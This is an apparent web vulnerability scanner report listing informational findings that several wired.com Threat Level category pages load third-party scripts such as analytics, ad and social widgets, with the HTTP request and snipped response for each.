<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.109. http://www.wired.com/threatlevel/category/identification/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/identification/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/identification/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=188
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.110. http://www.wired.com/threatlevel/category/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/intellectual-property/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/intellectual-property/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:03 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=213
Expires: Wed, 12 Jan 2011 15:33:52 GMT
Date: Wed, 12 Jan 2011 15:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.111. http://www.wired.com/threatlevel/category/lori-drew-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/lori-drew-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/lori-drew-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=98
Expires: Wed, 12 Jan 2011 15:32:12 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.112. http://www.wired.com/threatlevel/category/network-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/network-neutrality/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/network-neutrality/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=147
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:30:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.113. http://www.wired.com/threatlevel/category/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/nsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/nsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=150
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.114. http://www.wired.com/threatlevel/category/openleaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/openleaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/openleaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=139
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:30:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.115. http://www.wired.com/threatlevel/category/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=124
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.116. http://www.wired.com/threatlevel/category/porn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/porn/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/porn/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:30:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=174
Expires: Wed, 12 Jan 2011 15:34:06 GMT
Date: Wed, 12 Jan 2011 15:31:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.117. http://www.wired.com/threatlevel/category/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/privacy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/privacy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=199
Expires: Wed, 12 Jan 2011 15:34:36 GMT
Date: Wed, 12 Jan 2011 15:31:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.118. http://www.wired.com/threatlevel/category/rfid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rfid/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/rfid/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=103
Expires: Wed, 12 Jan 2011 15:32:59 GMT
Date: Wed, 12 Jan 2011 15:31:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.119. http://www.wired.com/threatlevel/category/riaa-litigation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/riaa-litigation/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/riaa-litigation/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=126
Expires: Wed, 12 Jan 2011 15:33:26 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.120. http://www.wired.com/threatlevel/category/rsa-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rsa-conference/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/rsa-conference/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=138
Expires: Wed, 12 Jan 2011 15:33:38 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.121. http://www.wired.com/threatlevel/category/sexting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sexting/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/sexting/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
